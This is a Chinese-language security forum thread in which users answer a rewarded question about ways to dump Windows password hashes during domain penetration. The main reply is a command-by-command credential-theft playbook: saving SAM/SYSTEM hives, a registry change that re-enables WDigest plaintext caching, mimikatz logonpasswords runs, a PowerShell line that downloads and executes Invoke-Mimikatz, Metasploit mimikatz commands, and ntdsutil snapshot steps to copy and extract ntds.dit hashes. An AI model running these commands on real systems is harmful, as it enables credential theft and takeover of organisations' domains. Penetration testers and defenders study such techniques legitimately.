[红包奖励]域渗透,你有多少种方法dump hash

277870-106.jpg
关于域渗透,我们往往要dump 用户hash  dump hash 原理是什么,有多少种方法dump hash,come,精华回复有红包哦
 
已邀请:

saline

赞同来自: kakaxi Mosuan zksmile ttgo2

刚醒[xing/性],看到这个感觉很有意思。其实这块就特么的多了.
比如windows hash在2000-2003都是有LM的。自从失败的Vista开始就没有LM的了[或者是LM为空](类似SM还是挺多的)。只是存进了NTLM。这些可以在http://www.objectif-securite.ch/ophcrack.php 或者 cmd5.com 进行在线破解
Hash一般存储在两个地方:
SAM文件,存储在本机 对应本地用户
NTDS.DIT文件,存储在域控上 对应域用户
 
抓明文
最还是的是一个gethashes的文件/hash
后来出了神器wce(明文+hash)【tips:wce抓到本地hash,远程共享开启了的机器可以考虑远程注入】还有mimikatz
2003的注册表导出,然后cain进行加载然后就可以抓出来hash了
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
然后到了2008的时代各种hash失败了以后,有了QuarkPwDump照常的各种gethash
再后来就是powereshelll的时代了  Get-PassHashes.ps  /hash
发展到了win8以后的发现有些需要修改注册表才可以抓取
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1


mimikatz
本地抓
privilege::debug
sekurlsa::logonpasswords
非交互式抓
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt
还有powershell加载抓
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
也有metasploit抓
load mimikatz
mimikatz_command -f sekurlsa::searchPasswords
本地的啰嗦完了。说说域的,主要是针对NTDS.DIT文件来展开各种工作
导出ntds.dit
ntdsutil win2008开始DC中自带的工具
snapshot
activate instance ntds
create
mount xxx
也有非交互式
ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy MOUNT_POINT\windows\ntds\ntds.dit c:\temp\ntds.dit
ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit
利用QuarkPwDump来进行在线提取
QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit
离线提取
需要两个文件 ntds.dit 和 system.hiv
其中system.hiv可通过
reg save hklm\system system.hiv
获取。
QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit --system-file c:\system.hiv
还有一个ntdsdump http://z-cg.com/post/ntds_dit_pwd_dumper.html。还有一些~我记得曾经的drops好多类似的东西。可惜了~
 

糖醋黄瓜 - 没有蕾姆看我要死了!

赞同来自: kakaxi

metasploit连上后加载mimikatz模块 (仅限于Windows)
load mimikatz
登录操作系统用户名后抓取内存明文密码
mimikatz_command -f sekurlsa::searchPasswords
缺点,别人必须登录过
 

kakaxi - 人生保持空杯,你将成为最强的人,最可怕的不是对手,而是自己

赞同来自: zksmile

大表哥,放大招了

ttgo2 - 热血的青春,童真的性格,快乐的生活。

赞同来自:

学习了,,,

要回复问题请先登录注册